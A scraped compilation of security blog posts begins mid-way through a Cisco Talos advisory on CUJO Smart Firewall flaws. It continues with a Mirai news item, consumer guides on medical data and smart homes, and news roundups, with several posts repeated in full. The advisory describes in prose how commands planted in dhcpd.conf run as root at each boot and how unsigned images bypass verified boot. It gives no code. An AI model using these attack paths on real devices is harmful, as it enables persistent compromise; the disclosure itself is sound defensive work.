      CUJO uses Das U-Boot's "Verified Boot," an open-source primary boot loader that aims to protect the boot process from unauthorized modifications, and as a consequence, at avoiding a persistent compromise of the device. Moreover, the first 16MB of CUJO's eMMC have been permanently write-protected, so that it is not possible, even for the manufacturer, to modify the system's bootloaders. We identified two vulnerabilities that bypass these protections.

      • We identified an issue in Das U-Boot, affecting versions 2013.07-rc1 to 2014.07-rc2 (inclusive). TALOS-2018-0633 shows that U-Boot FIT images' signatures are not enforced, since it is still possible to boot from legacy unsigned images. This behavior can be exploited by simply replacing a signed FIT image with a legacy (and thus unsigned) image. CUJO uses the OCTEON SDK, which in turn uses U-Boot version 2013.07, so they are both vulnerable to this issue. Because of this, and since products have no possibility to use the impacted U-Boot versions without avoiding the issue, this CVE has been assigned to U-Boot.

      As previously stated, since the U-Boot bootloader is unmodifiable, TALOS-2018-0633 cannot be fixed in CUJO. Note, however, that, in isolation, this is less severe of an issue. See our discussion below for more details.

      • TALOS-2018-0634 describes an additional way to bypass the secure boot process. By modifying the `dhcpd.conf` file, it is possible to make the DHCP server execute shell commands. Since this file persists across reboots, it is possible to execute arbitrary commands as root at each boot, effectively compromising the system's integrity.

      Safe browsing bypass


      Finally, TALOS-2018-0702 shows how to bypass CUJO's safe browsing, potentially allowing malicious websites to serve malware even in presence of CUJO's filtering.

      Vulnerability details


      CUJO Smart Firewall static DHCP hostname command injection vulnerability (TALOS-2018-0627/CVE-2018-3963)


      The CUJO Smart Firewall is vulnerable to command injection within the DHCP daemon configuration present on affected devices. This vulnerability exists due to a lack of proper input sanitization during the DHCP configuration process. This vulnerability can be triggered when configuring a new static DHCP address on affected devices. An attacker could send a DHCP request message and set up a corresponding static DHCP entry to trigger this vulnerability. It should be noted that in order to modify the DHCP configuration on devices, an attacker would first need to authenticate to the system using valid user credentials. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary commands within the context of the root account on the system. For additional information, please see the advisory here.

      Das U-Boot verified boot bypass (TALOS-2018-0633/CVE-2018-3968)


      Das U-Boot allows an attacker to execute an unsigned kernel embedded in a legacy image format if they are able to supply a boot image to the device. This vulnerability exists due to the fact that the version of Das U-Boot used by the devices lacks proper FIT signature enforcement during the boot process. While Das U-Boot has silently fixed this issue, the version used by the CUJO Smart Firewall was not updated to the new version, and is thus vulnerable. However we believe it's only a medium severity issue in CUJO specifically, since the exploitation requires either physical or local access to the device (e.g. via an additional root exploit). For additional information, please see the advisory here.

      CUJO Smart Firewall dhcpd.conf verified boot bypass (TALOS-2018-0634/CVE-2018-3969)


      The CUJO Smart Firewall is vulnerable to a bypass of the verified boot process. Successful exploitation of this vulnerability could allow an attacker to execute arbitrary system commands during the system boot process. By embedding system commands into the `/config/dhcpd.conf` file, an attacker can force those commands to be executed each time the system is rebooted. Also, since this information is stored in the /config partition, it is persistent across reboots. In order to successfully exploit this vulnerability, an attacker would need the ability to write to the `/config/dhcpd.conf` file on affected systems. It is important to note that this is achievable using TALOS-2018-0627, which is described above. For additional information, please see the advisory here.

      CUJO Smart Firewall mdnscap mDNS record parsing code execution vulnerability (TALOS-2018-0653/CVE-2018-3985)


      The CUJO Smart Firewall is vulnerable to an exploitable double free vulnerability present in the `mdnscap` binary on affected systems. This vulnerability exists due to the system freeing a memory space twice when an invalid query name is encountered while the device is parsing mDNS packets. This vulnerability could be leveraged by an unauthenticated attacker to obtain the ability to execute arbitrary code in the context of the mdnscap process. In order to fully compromise the system, an attacker would still need to escape the `chroot` environment and further escalate privileges. For additional information, please see the advisory here.


      CUJO Smart Firewall mdnscap mDNS label compression denial-of-service vulnerability (TALOS-2018-0671/CVE-2018-4002)


      The CUJO Smart Firewall is vulnerable to an exploitable denial-of-service vulnerability in the `mdnscap` binary present on affected systems. This vulnerability exists due to the system incorrectly processing label compression pointers while parsing mDNS packets. In certain conditions, the improper handling of compression pointers in mDNS packets can lead to uncontrolled recursion, which causes stack exhaustion and ultimately crashes the `mdnscap` process, causing a denial-of-service condition. An unauthenticated remote attacker could leverage a specially crafted mDNS packet to exploit this vulnerability and create a denial-of-service condition on affected devices. For additional information, please see the advisory here.


      CUJO Smart Firewall mdnscap mDNS character-strings code execution vulnerability (TALOS-2018-0672/CVE-2018-4003)


      The CUJO Smart Firewall is vulnerable to an exploitable code execution vulnerability in the `mdnscap` binary present on affected systems. This vulnerability exists due to the system incorrectly handling string lengths that may exist in the character strings in mDNS resource records. A specially crafted mDNS resource record could be leveraged by an unauthenticated remote attacker to create a heap-based buffer overflow condition and ultimately lead to arbitrary code execution in the context of the `mdnscap` process on affected devices. In order to fully compromise the system, an attacker would still need to escape the `chroot` environment and further escalate privileges. For additional information, please see the advisory here.


      CUJO Smart Firewall mdnscap mDNS SRV Record denial-of-service vulnerability (TALOS-2018-0681/CVE-2018-4011)


      The CUJO Smart Firewall is vulnerable to an exploitable integer underflow vulnerability present in the `mdnscap` binary present on affected systems. This vulnerability exists due to the system incorrectly handling the "RDLENGTH" value when parsing SRV records in mDNS packets. An unauthenticated remote attacker could leverage a specially crafted SRV record to trigger this vulnerability and create a denial-of-service condition on affected devices. For additional information, please see the advisory here.


      Webroot BrightCloud SDK HTTP headers-parsing code execution vulnerability (TALOS-2018-0683/CVE-2018-4012)


      The Webroot BrightCloud SDK is vulnerable to an exploitable buffer overflow in the HTTP header-parsing function. The function `bc_http_read_header` incorrectly handles overlong headers, leading to arbitrary code execution. An unauthenticated attacker could impersonate a remote BrightCloud server to trigger this vulnerability and gain arbitrary code execution on affected devices. This SDK is found inside the CUJO Smart Firewall, as well as the CUJO Smart Firewall and the Webroot BrightCloud SDK. For additional information, please see the advisory here.


      Webroot BrightCloud SDK HTTP connection unsafe defaults vulnerability (TALOS-2018-0686/CVE-2018-4015)


      An exploitable vulnerability exists in the HTTP client function of the Webroot BrightCloud SDK, which is used by the CUJO Smart Firewall. The configuration of the HTTP client does not enforce a secure connection by default, resulting in a failure to validate TLS certificates. An attacker could impersonate a remote BrightCloud server to exploit this vulnerability using a man-in-the-middle attack. Successful exploitation could result in exposure of sensitive credentials, the transparent alteration of BrightCloud queries, or exploitation of vulnerabilities in the underlying SDK. For additional information, please see the advisory here.

      CUJO Smart Firewall safe browsing Host header parsing firewall bypass vulnerability (TALOS-2018-0702/CVE-2018-4030)


      The CUJO Smart Firewall is vulnerable to an exploitable firewall evasion in the HTTP and HTTPS parsing used by the firewall's safe browsing function. This vulnerability exists due to the firewall improperly processing host information in HTTP and HTTPS traffic that is inspected by the devices during web reputation checking. An attacker could create specially crafted web traffic to evade this reputation checking and allow hosts to access external web servers that the firewall would not otherwise allow access to. For additional information, please see the advisory here.


      CUJO Smart Firewall threatd hostname reputation check code execution vulnerability (TALOS-2018-0703 / CVE-2018-4031)


      The CUJO Smart Firewall is vulnerable to an exploitable code execution vulnerability in the HTTP and HTTPS parsing used by the firewall's safe browsing function. This vulnerability exists due to lack of sanitization of host information present in HTTP and HTTPS traffic that is inspected by the devices during web reputation checking. This vulnerability could be leveraged by an attacker to execute arbitrary code on affected devices. An attacker could create a specially crafted network packet or leverage a malicious web server to exploit this vulnerability. For additional information, please see the advisory here.

      Versions Tested


      Talos tested and confirmed that the following CUJO Smart Firewall firmware versions are affected:

      TALOS-2018-0627 affects CUJO Smart Firewall, version 7003.

      TALOS-2018-0633 affects CUJO Smart Firewall, version 7003; OCTEON-SDK 3.1.2 to 5.1; and Das U-Boot 2013.07-rc1 to 2014.07-rc2.

      Conclusion


      As previously described, CUJO AI has provided a system update to resolve these issues. Since these devices are typically relied on to secure home network environments, they may be deployed in sensitive locations within the network. It is recommended that affected users confirm their devices have been updated as soon as possible to ensure that the devices are no longer affected by these vulnerabilities.

      Coverage


      The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

      Snort Rules: 47234, 47663, 47809, 47811, 47842, 48261, 48262

      New IoT Security Bill: Third Time’s the Charm?

      The latest bill to set security standards for connected devices sold to the US government has fewer requirements, instead leaving recommendations to the National Institute of Standards and Technology. For

      The post New IoT Security Bill: Third Time’s the Charm? appeared first on The Cyber Security Place.

      A new development shows a potential shift to using Mirai to target enterprises

      PaloAlto Networks researchers discovered a new variant of the infamous Mirai botnet is targeting IoT devices belonging to businesses.

      Researchers at PaloAlto Networks spotted a new variant of the infamous Mirai botnet is targeting IoT devices belonging to businesses.

      Mirai malware first appeared in the wild in 2016 when the expert MalwareMustDie discovered it in massive attacks aimed at Internet of Things (IoT) devices.

      mirai

      Since the code of the Mirai botnet was leaked online many variants emerged in the threat landscape. SatoriMasutaWicked MiraiJenX, Omni, and the OMG botnet are just the last variants appeared online in 2018.

      A variant discovered last year was leveraging an open-source project to target multiple architectures, including ARM, MIPS, PowerPC, and x86.

      The new Mirai variant targets embedded devices (i.e. routers, network storage devices, NVRs, and IP cameras) and leverages various exploits to hack them.

      Experts observed attacks against WePresent WiPG-1000 Wireless Presentation systems and LG Supersign TVs, both families of devices intended for use within business environments.

      “In particular, Unit 42 found this new variant targeting WePresent WiPG-1000 Wireless Presentation systems, and in LG Supersign TVs. Both these devices are intended for use by businesses. This development indicates to us a potential shift to using Mirai to target enterprises.” Palo Alto Networks notes

      “The previous instance where we observed the botnet targeting enterprise vulnerabilities was with the incorporation of exploits against Apache Struts and SonicWall,”

      The malicious code was hosted at a compromised website in Colombia: an “Electronic security, integration and alarm monitoring” business.

      Researchers discovered that the new Mirai variant uses a total of 27 exploits, 11 of them are new to the threat. The bot can also leverage a new set of credentials to use while carrying out brute force attacks.

      The new malware implements the same encryption scheme characteristic of Mirai, it is also able to scan for vulnerable devices and launch HTTP Flood DDoS attacks.

      The samples analyzed by the experts were fetching the same payload hosted at the same IP that had been hosting some Gafgyt samples just a few days before, and that these used the same name as the binaries fetched by the shell script.

      “IoT/Linux botnets continue to expand their attack surface, either by the incorporation of multiple exploits targeting a plethora of devices, or by adding to the list of default credentials they brute force, or both.”
      Palo Alto Networks concludes. “In addition, targeting enterprise vulnerabilities allows them access to links with potentially larger bandwidth than consumer device links, affording them greater firepower for DDoS attacks,”

      Further details, including IoCs are reported in the analysis published by PaloAlto Networks.

      Pierluigi Paganini

      (SecurityAffairs – Mirai, IoT)

      The post A new development shows a potential shift to using Mirai to target enterprises appeared first on Security Affairs.

      Security Affairs: A new development shows a potential shift to using Mirai to target enterprises

      PaloAlto Networks researchers discovered a new variant of the infamous Mirai botnet is targeting IoT devices belonging to businesses.

      Researchers at PaloAlto Networks spotted a new variant of the infamous Mirai botnet is targeting IoT devices belonging to businesses.

      Mirai malware first appeared in the wild in 2016 when the expert MalwareMustDie discovered it in massive attacks aimed at Internet of Things (IoT) devices.

      mirai

      Since the code of the Mirai botnet was leaked online many variants emerged in the threat landscape. SatoriMasutaWicked MiraiJenX, Omni, and the OMG botnet are just the last variants appeared online in 2018.

      A variant discovered last year was leveraging an open-source project to target multiple architectures, including ARM, MIPS, PowerPC, and x86.

      The new Mirai variant targets embedded devices (i.e. routers, network storage devices, NVRs, and IP cameras) and leverages various exploits to hack them.

      Experts observed attacks against WePresent WiPG-1000 Wireless Presentation systems and LG Supersign TVs, both families of devices intended for use within business environments.

      “In particular, Unit 42 found this new variant targeting WePresent WiPG-1000 Wireless Presentation systems, and in LG Supersign TVs. Both these devices are intended for use by businesses. This development indicates to us a potential shift to using Mirai to target enterprises.” Palo Alto Networks notes

      “The previous instance where we observed the botnet targeting enterprise vulnerabilities was with the incorporation of exploits against Apache Struts and SonicWall,”

      The malicious code was hosted at a compromised website in Colombia: an “Electronic security, integration and alarm monitoring” business.

      Researchers discovered that the new Mirai variant uses a total of 27 exploits, 11 of them are new to the threat. The bot can also leverage a new set of credentials to use while carrying out brute force attacks.

      The new malware implements the same encryption scheme characteristic of Mirai, it is also able to scan for vulnerable devices and launch HTTP Flood DDoS attacks.

      The samples analyzed by the experts were fetching the same payload hosted at the same IP that had been hosting some Gafgyt samples just a few days before, and that these used the same name as the binaries fetched by the shell script.

      “IoT/Linux botnets continue to expand their attack surface, either by the incorporation of multiple exploits targeting a plethora of devices, or by adding to the list of default credentials they brute force, or both.”
      Palo Alto Networks concludes. “In addition, targeting enterprise vulnerabilities allows them access to links with potentially larger bandwidth than consumer device links, affording them greater firepower for DDoS attacks,”

      Further details, including IoCs are reported in the analysis published by PaloAlto Networks.

      Pierluigi Paganini

      (SecurityAffairs – Mirai, IoT)

      The post A new development shows a potential shift to using Mirai to target enterprises appeared first on Security Affairs.



      Security Affairs

      How to Safeguard Your Family Against A Medical Data Breach

      Medical Data BreachThe risk to your family’s healthcare data often begins with that piece of paper on a clipboard your physician or hospital asks you to fill out or in the online application for healthcare you completed.

      That data gets transferred into a computer where a patient Electronic Health Record (EHR) is created or added to. From there, depending on the security measures your physician, healthcare facility, or healthcare provider has put in place, your data is either safely stored or up for grabs.

      It’s a double-edged sword: We all need healthcare but to access it we have to hand over our most sensitive data armed only with the hope that the people on the other side of the glass window will do their part to protect it.

      Breaches on the Rise

      Feeling a tad vulnerable? You aren’t alone. The stats on medical breaches don’t do much to assuage consumer fears.

      A recent study in the Journal of the American Medical Association reveals that the number of annual health data breaches increased 70% over the past seven years, with 75% of the breached, lost, or stolen records being breached by a hacking or IT incident at a cost close to consumers at nearly $6 billion.

      The IoT Factor

      Medical Data Breach

      Not only are medical facilities vulnerable to hackers, but with the growth of the Internet of Things (IoT) consumer products — which, in short, means everything is digitally connected to everything else — also provide entry points for hackers. Wireless devices at risk include insulin pumps and monitors, Fitbits, scales, thermometers, heart and blood pressure monitors.

      To protect yourself when using these devices, experts recommend staying on top of device updates and inputting as little personal information as possible when launching and maintaining the app or device.

      The Dark Web

      The engine driving healthcare attacks of all kinds is the Dark Web where criminals can buy, sell, and trade stolen consumer data without detection. Healthcare data is precious because it often includes a much more complete picture of a person including social security number, credit card/banking information, birthdate, address, health care card information, and patient history.

      With this kind of data, many corrupt acts are possible including identity theft, fraudulent medical claims, tax fraud, credit card fraud, and the list goes on. Complete medical profiles garner higher prices on the Dark Web.

      Some of the most valuable data to criminals are children’s health information (stolen from pediatrician offices) since a child’s credit records are clean and more useful tools in credit card fraud.

      According to Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research, predictions for 2019 include criminals working even more diligently in the Dark Web marketplace to devise and launch more significant threats.

      “The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before,” Says Samani.

      Medical Data Breach

      Healthcare professionals, hospitals, and health insurance companies, while giving criminals an entry point, though responsible, aren’t the bad guys. They are being fined by the government for breaches and lack of proper security, and targeted and extorted by cyber crooks, while simultaneously focusing on patient care and outcomes. Another factor working against them is the lack of qualified cybersecurity professionals equipped to protect healthcare practices and facilities.

      Protecting ourselves and our families in the face of this kind of threat can feel overwhelming and even futile. It’s not. Every layer of protection you build between you and a hacker, matters. There are some things you can do to strengthen your family’s healthcare data practices.

      Ways to Safeguard Medical Data

      Don’t be quick to share your SSN. Your family’s patient information needs to be treated like financial data because it has that same power. For that reason, don’t give away your Social Security Number — even if a medical provider asks for it. The American Medical Association (AMA) discourages medical professionals from collecting patient SSNs nowadays in light of all the security breaches.

      Keep your healthcare card close. Treat your healthcare card like a banking card. Know where it is, only offer it to physicians when checking in for an appointment, and report it immediately if it’s missing.

      Monitor statements. The Federal Trade Commission recommends consumers keep a close eye on medical bills. If someone has compromised your data, you will notice bogus charges right away. Pay close attention to your “explanation of benefits,” and immediately contact your healthcare provider if anything appears suspicious.

      Ask about security. While it’s not likely you can change your healthcare provider’s security practices on the spot, the more consumers inquire about security standards, the more accountable healthcare providers are to following strong data protection practices.

      Pay attention to apps, wearables. Understand how app owners are using your data. Where is the data stored? Who is it shared with? If the app seems sketchy on privacy, find a better one.

      How to Protect IoT Devices

      Medical Data Breach

      According to the Federal Bureau of Investigation (FBI), IoT devices, while improving medical care and outcomes, have their own set of safety precautions consumers need to follow.

      • Change default usernames and passwords
      • Isolate IoT devices on their protected networks
      • Configure network firewalls to inhibit traffic from unauthorized IP addresses
      • Implement security recommendations from the device manufacturer and, if appropriate, turn off devices when not in use
      • Visit reputable websites that specialize in cybersecurity analysis when purchasing an IoT device
      • Ensure devices and their associated security patches are up-to-date
      • Apply cybersecurity best practices when connecting devices to a wireless network
      • Invest in a secure router with appropriate security and authentication practices

      The post How to Safeguard Your Family Against A Medical Data Breach appeared first on McAfee Blogs.

      McAfee Blogs: How to Safeguard Your Family Against A Medical Data Breach

      Medical Data BreachThe risk to your family’s healthcare data often begins with that piece of paper on a clipboard your physician or hospital asks you to fill out or in the online application for healthcare you completed.

      That data gets transferred into a computer where a patient Electronic Health Record (EHR) is created or added to. From there, depending on the security measures your physician, healthcare facility, or healthcare provider has put in place, your data is either safely stored or up for grabs.

      It’s a double-edged sword: We all need healthcare but to access it we have to hand over our most sensitive data armed only with the hope that the people on the other side of the glass window will do their part to protect it.

      Breaches on the Rise

      Feeling a tad vulnerable? You aren’t alone. The stats on medical breaches don’t do much to assuage consumer fears.

      A recent study in the Journal of the American Medical Association reveals that the number of annual health data breaches increased 70% over the past seven years, with 75% of the breached, lost, or stolen records being breached by a hacking or IT incident at a cost close to consumers at nearly $6 billion.

      The IoT Factor

      Medical Data Breach

      Not only are medical facilities vulnerable to hackers, but with the growth of the Internet of Things (IoT) consumer products — which, in short, means everything is digitally connected to everything else — also provide entry points for hackers. Wireless devices at risk include insulin pumps and monitors, Fitbits, scales, thermometers, heart and blood pressure monitors.

      To protect yourself when using these devices, experts recommend staying on top of device updates and inputting as little personal information as possible when launching and maintaining the app or device.

      The Dark Web

      The engine driving healthcare attacks of all kinds is the Dark Web where criminals can buy, sell, and trade stolen consumer data without detection. Healthcare data is precious because it often includes a much more complete picture of a person including social security number, credit card/banking information, birthdate, address, health care card information, and patient history.

      With this kind of data, many corrupt acts are possible including identity theft, fraudulent medical claims, tax fraud, credit card fraud, and the list goes on. Complete medical profiles garner higher prices on the Dark Web.

      Some of the most valuable data to criminals are children’s health information (stolen from pediatrician offices) since a child’s credit records are clean and more useful tools in credit card fraud.

      According to Raj Samani, Chief Scientist and McAfee Fellow, Advanced Threat Research, predictions for 2019 include criminals working even more diligently in the Dark Web marketplace to devise and launch more significant threats.

      “The game of cat and mouse the security industry plays with ransomware developers will escalate, and the industry will need to respond more quickly and effectively than ever before,” Says Samani.

      Medical Data Breach

      Healthcare professionals, hospitals, and health insurance companies, while giving criminals an entry point, though responsible, aren’t the bad guys. They are being fined by the government for breaches and lack of proper security, and targeted and extorted by cyber crooks, while simultaneously focusing on patient care and outcomes. Another factor working against them is the lack of qualified cybersecurity professionals equipped to protect healthcare practices and facilities.

      Protecting ourselves and our families in the face of this kind of threat can feel overwhelming and even futile. It’s not. Every layer of protection you build between you and a hacker, matters. There are some things you can do to strengthen your family’s healthcare data practices.

      Ways to Safeguard Medical Data

      Don’t be quick to share your SSN. Your family’s patient information needs to be treated like financial data because it has that same power. For that reason, don’t give away your Social Security Number — even if a medical provider asks for it. The American Medical Association (AMA) discourages medical professionals from collecting patient SSNs nowadays in light of all the security breaches.

      Keep your healthcare card close. Treat your healthcare card like a banking card. Know where it is, only offer it to physicians when checking in for an appointment, and report it immediately if it’s missing.

      Monitor statements. The Federal Trade Commission recommends consumers keep a close eye on medical bills. If someone has compromised your data, you will notice bogus charges right away. Pay close attention to your “explanation of benefits,” and immediately contact your healthcare provider if anything appears suspicious.

      Ask about security. While it’s not likely you can change your healthcare provider’s security practices on the spot, the more consumers inquire about security standards, the more accountable healthcare providers are to following strong data protection practices.

      Pay attention to apps, wearables. Understand how app owners are using your data. Where is the data stored? Who is it shared with? If the app seems sketchy on privacy, find a better one.

      How to Protect IoT Devices

      Medical Data Breach

      According to the Federal Bureau of Investigation (FBI), IoT devices, while improving medical care and outcomes, have their own set of safety precautions consumers need to follow.

      • Change default usernames and passwords
      • Isolate IoT devices on their protected networks
      • Configure network firewalls to inhibit traffic from unauthorized IP addresses
      • Implement security recommendations from the device manufacturer and, if appropriate, turn off devices when not in use
      • Visit reputable websites that specialize in cybersecurity analysis when purchasing an IoT device
      • Ensure devices and their associated security patches are up-to-date
      • Apply cybersecurity best practices when connecting devices to a wireless network
      • Invest in a secure router with appropriate security and authentication practices

      The post How to Safeguard Your Family Against A Medical Data Breach appeared first on McAfee Blogs.



      McAfee Blogs

      The sights and sounds of Cisco Talos at RSA 2019


      An estimated 45,000 people attended this year’s RSA Conference in San Francisco to hear talks from some of the greatest minds in security.

      As always, Cisco and Talos had a massive presence at the conference, topping off the week with a keynote address featuring Matt Watchinski, the vice president of Cisco Talos, and Liz Centoni, a senior vice president and general manager of Cisco’s Internet-of-things business group.

      Blue and orange Snorts could be seen all over the conference floor, and our researchers spent the past few days speaking at the Cisco Security booth, discussing some of the latest and most pressing threats.


      After their keynote on how to protect IoT devices, Matt and Liz continued the rounds throughout the week, including sitting down for an interview with Shira Rubinoff, a cybersecurity social media influencer and author, to talk about the dangers the recent influx of IoT devices represents.



      You can also watch a recording of their keynote below and read our recap here.



      Cisco Talos would like to thank anyone who stopped by the booth, viewed our threat map or interacted with any of our threat researchers this week. For a look at what we were up to this week, click through the slideshow at the top of the post.

      This Week in Security News: IoT Threats and Risks

      Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, learn about the threats and risks to complex IoT environments. Also, learn about new security challenges and risks the food production industry faces.

      Read on:

      Securing Smart Homes and Buildings: Threats and Risks to Complex IoT Environments

      The evolution of smart homes and smart buildings into complex IoT environments reflects the continuing developments in home and industrial automation and means new threats and risks. 

      Cultivating Security in the Food Production Industry: Nipping IoT Risks and Threats in the Bud

      In the food production industry, high-tech tools and systems are being used to optimize production conditions. But new technology brings new challenges and risks. 

      Shifting Strategies: Using Social Media, SEO in Tech Support Scams

      Trend Micro observed several tech support scams being promoted in different social media platforms. These scams attempt to obtain personally identifiable information or charge victims for their “services.” 

      RSA Conference 2019: The Sky’s the Limit For Satellite Hacks

      As more satellites go up, antenna equipment becomes cheaper, and engineers don’t uphold information security principals, satellites are becoming a lucrative target for threat actors. 

      UPnP-enabled Connected Devices in the Home and Unpatched Known Vulnerabilities

      The hackers behind the cyber-attack of YouTuber PewDiePie’s channel reportedly took advantage of poorly configured routers that had the Universal Plug and Play (UPnP) service enabled. 

      Enterprises Faced Over 8 Million High-Risk Email Threats in 2018 Alone

      Trend Micro released its 2018 Cloud App Security Report and discovered that enterprises faced over 8 million high-risk email threats in 2018 alone—a significant increase over 2017.

      Exposed IoT Automation Servers and Cybercrime

      Trend Micro tested possible threat scenarios against complex IoT environments such as in smart homes and smart buildings and also looked into exposed automation platforms or servers.

      NSA Puts ‘Ghidra,’ Its Reverse-Engineering Tool for Malware, in the Hands of the Public

      After years lurking in the shadows, the National Security Agency has open-sourced their software for reverse-engineering malware to anyone with an internet connection in hopes of leading to collaborative improvements to the tool.

      Trend Micro Cloud App Security Report 2018: Advanced Defenses for Advanced Email Threats

      To provide organizations a comprehensive view of the email threat landscape, Trend Micro looked at notable occurrences of advanced email threats as well as advanced security techniques.

      Huawei Opens a Cybersecurity Transparency Center in the Heart of Europe

      5G kit maker Huawei opened a Cyber Security Transparency center in Brussels as the Chinese tech giant continues to try to neutralize suspicion in Western markets that its networking gear could be used for espionage by the Chinese state.

      2018 Mobile Threat Landscape

      Trend Micro looked back at 2018’s mobile threat landscape to see the possible threats that lie ahead and help users and organizations proactively defend against them.

      Did any of the threats and risks of complex IoT environments or the food industry surprise you? Why or why not? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

      The post This Week in Security News: IoT Threats and Risks appeared first on .

      Cyber Security Week in Review (March 8)



      Welcome to this week's Cyber Security Week in Review, where Cisco Talos runs down all of the news we think you need to know in the security world. For more news delivered to your inbox every week, sign up for our Threat Source newsletter here.

      Top headlines this week

      • Chinese tech company Huawei is suing the U.S. government. The company alleges that the federal government violated the Constitution when it banned government agencies from buying Huawei software. The two sides have been locked in a war of words over the past year as U.S. officials raise allegations of spying and security concerns against Huawei.
      • Cisco disclosed 23 vulnerabilities affecting the NX-OS software that could put some switches at risk. The most critical vulnerability, which received a CVSS score of 8.6, lies in the Lightweight Directory Access Protocol (LDAP) in Cisco FXOS and NX-OS. An attacker could exploit this bug to gain the ability to restart the device, resulting in a denial of service. Snort rules 49334 - 49336 and 49350 can protect you from these vulnerabilities.
      • The National Security Agency released its reverse-engineering tool, Ghidra, to the public. At the RSA security conference, the agency made the software open source. While there are many reverse-engineering tools on the market, the NSA has spent years refining Ghidra and it’s largely believed one of the most sophisticated decompilers available. 

      From Talos

      • Information security and operational security teams need to work together to protect IoT. That was the main takeaway from Cisco’s keynote at the RSA conference earlier this week. Matt Watchinski, the vice president of Cisco Talos, and Liz Centoni, the head of Cisco’s internet-of-things business group, said that IoT devices have become so entrenched in our society that it’s become more important now than ever to secure them. You can watch a replay of the address here
      • There are three vulnerabilities in Pixar Renderman that could allow an attacker to elevate their privileges to root. Renderman is a rendering application used in animation and film production produced by Pixar, a well-known film studio. When installing the application, a helper tool is installed and launched as root. This service continues to listen even after installation is complete. These vulnerabilities lie in the `Dispatch` function of this helper tool.

      Malware roundup

      • A new, layered malware has popped up on the popular Pirate Bay torrenting website. Known as PirateMatryoshka, the trojan disguises itself as a legitimate torrent. Once downloaded, it has numerous layers to it and acts as a downloader to several other malicious programs. 
      • A relatively unknown threat group known as “Whitefly” is allegedly behind an attack on Singapore’s health care database. Security researchers say the group was behind the exposure of 1.5 million patients’ records in July, most likely using DLL load-order attacks.
      • “Scarlett Widow,” a hacking group believed to be based out of Nigeria, recently started a new wave of attacks. The actor has sent several malicious to K-12 schools and non-profits, including the Boy Scouts of America. So far the group is believed to have information on 30,000 individuals from 13,000 organizations across 13 different countries. 

      The rest of the news

      • More than 300 million private messages in China were exposed on the internet. It is widely believed that the messages, which were transmitted on secure messaging apps, had been collected by the Chinese government. The database made personal identities searchable by anyone who found the IP address. 
      • U.S. Cyber Command carried out an offensive operation against a U.S. Russian troll farm last year. The attack targeted hacking groups known for spreading misinformation, specifically trying to shut them down on the day of the 2018 midterm elections in the U.S. 
      • A new Senate report says Equifax neglected proper cybersecurity practices for years. The credit reporting agency was the victim of a massive cyber attack in 2017 that led to the exposure of 145 million Americans’ personal information. The report states that the attack could have been avoided had the company followed “widely agreed upon” cybersecurity practices. 


      How To Secure Your Smart Home

      Do you live in a “smart” home? If you look around and see interactive speakers, IP cameras, and other internet-connected devices like thermostats and appliances, you are now one of the millions of people who live with so-called “smart” devices. They bring convenience and comfort into our lives, but they also bring greater risks, by giving cybercrooks new opportunities to access our information, and even launch attacks.

      You may remember a couple of years ago when thousands of infected devices were used to take down the websites of internet giants like Twitter and Netflix by overwhelming them with traffic. The owners of those devices were regular consumers, who had no idea that their IP cameras and DVRs had been compromised. You may also have heard stories of people who were eavesdropped on via their baby monitors, digital assistants, and webcams when their private networks were breached.

      Unfortunately, these are not rare cases. In recent months, the “Internet of Things” (IoT) has been used repeatedly to spy on businesses, launch attacks, or even deliver cryptojacking malware or ransomware.

      Still, given the benefits we get from these devices, they are probably here to stay.  We just need to acknowledge that today’s “smart” devices can be a little “dumb” when it comes to security. Many lack built-in security protections, and consumers are still learning about the risks they can pose. This is particularly concerning since the market for smart devices is large and growing. There are currently 7 billion IoT devices being used worldwide, and that number is expected to grow to 22 billion by 2025.

      Cybercrooks have already taken note of these opportunities since malware attacks on smart devices have escalated rapidly. In fact, McAfee reported that malware directed at IoT devices was up 73%in the third quarter of 2018 alone.

      So, whether you have one IoT device, or many, it’s worth learning how to use them safely.

      Follow these smart home safety tips:

      • Research before you buy—Although most IoT devices don’t have built-in protection, some are safer than others. Look for devices that make it easy to disable unnecessary features, update software, or change default passwords. If you already have an older device that lacks many of these features, consider upgrading it.
      • Safeguard your devices—Before you connect a new IoT device to your home network — allowing it to potentially connect with other data-rich devices, like smartphones and computers— change the default username and password to something strong, and unique. Hackers often know the default settings and share them online.Then, turn off any manufacturer settings that do not benefit you, like remote access. This is a feature some manufacturers use to monitor their products, but it could also be used by cybercrooks to access your system. Finally, make sure that your device software is up-to-date by checking the manufacturer’s website. This ensures that you are protected from any known vulnerabilities.
      • Secure your network—Your router is the central hub that connects all of the devices in your home, so you need to make sure that it’s secure. If you haven’t already, change the default password and name of your router. Make sure your network name does not give away your address, so hackers can’t locate it. Then check that your router is using an encryption method, like WPA2, which will keep your communications secure. Consider setting up a “guest network” for your IoT devices. This is a second network on your router that allows you to keep your computers and smartphones separate from IoT devices. So, if a device is compromised, a hacker still cannot get to all the valuable information that is saved on your computers. Check your router’s manual for instructions on how to set up a guest network. You may also want to consider investing in an advanced internet router that has built-in protection and can secure and monitor any device that connects to your network.
      • Install comprehensive security software –Finally, use comprehensive security software that can safeguard all your devices and data from known vulnerabilities and emerging threats.

      Looking for more mobile security tips and trends? Be sure to follow @McAfee Home on Twitter, and like us on Facebook.

      The post How To Secure Your Smart Home appeared first on McAfee Blogs.

      Smashing Security #118: The ‘s’ in IoT stands for security

      Smashing Security #118: The 's' in IoT stands for security

      Twerking robot assistants, an app from Saudi Arabia that lets men track women, and a gnarly skiing security snarl-up!

      All this and much more is discussed in the latest edition of the award-winning “Smashing Security” podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by technology journalist Geoff White.

      Cisco, Talos tout importance of IoT security at RSA keynote

      Matt Watchinski, the vice president of Cisco Talos, delivers a keynote address at the RSA Conference in San Francisco on Tuesday.

      By Jonathan Munshaw of Cisco Talos and Liza Meak of The Network, Cisco’s technology news site.

      By 2020, Gartner predicts 20 billion connected devices will be online — and more devices mean more security threats. Connected devices have exploded into the public and corporate landscape, rattling the bars of the cyber security cage.

